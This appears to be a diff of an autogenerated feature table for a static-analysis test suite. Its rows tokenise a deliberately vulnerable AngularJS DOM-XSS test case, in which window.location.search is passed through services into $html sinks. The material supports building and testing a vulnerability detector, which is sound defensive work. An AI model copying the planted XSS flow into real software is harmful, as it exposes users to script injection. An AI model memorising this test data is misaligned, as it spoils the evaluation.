    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:147:61 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:147:61 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | | autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:149:9 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:147:71:147:85 | xssSinkService1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:27 | xssSinkService1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:27 | xssSinkService1 | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:27 | xssSinkService1 | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:27 | xssSinkService1 | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:27 | xssSinkService1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | exceptional return of xssSink ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | exceptional return of xssSink ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | exceptional return of xssSink ... search) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | exceptional return of xssSink ... search) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | exceptional return of xssSink ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | xssSink ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | xssSink ... search) | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | xssSink ... search) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | xssSink ... search) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:148:13:148:51 | xssSink ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:34 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:34 | window | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:34 | window | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:34 | window | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:34 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:43 | window.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:43 | window.location | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:43 | window.location | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:43 | window.location | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:43 | window.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:50 | window. ... .search | CalleeFlexibleAccessPath | xssSinkService1 | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:50 | window. ... .search | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:50 | window. ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:50 | window. ... .search | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:50 | window. ... .search | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:50 | window. ... .search | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:148:29:148:50 | window. ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:148:36:148:43 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:148:36:148:43 | location | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | +| autogenerated/Xss/DomBasedXss/tst.js:148:36:148:43 | location | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:148:36:148:43 | location | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:148:36:148:43 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:148:45:148:50 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:148:45:148:50 | search | contextSurroundingFunctionParameters | ()\n(xssSinkService1) | +| autogenerated/Xss/DomBasedXss/tst.js:148:45:148:50 | search | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:148:45:148:50 | search | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:148:45:148:50 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:150:10:150:16 | factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:150:10:150:16 | factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:150:10:150:16 | factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:150:10:150:16 | factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:150:10:150:16 | factory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:150:18:150:34 | "xssSinkService1" | CalleeFlexibleAccessPath | angular.module().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:150:18:150:34 | "xssSinkService1" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:150:18:150:34 | "xssSinkService1" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16585,6 +115201,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:150:18:150:34 | "xssSinkService1" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:150:18:150:34 | "xssSinkService1" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:150:18:150:34 | "xssSinkService1" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:150:36 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| 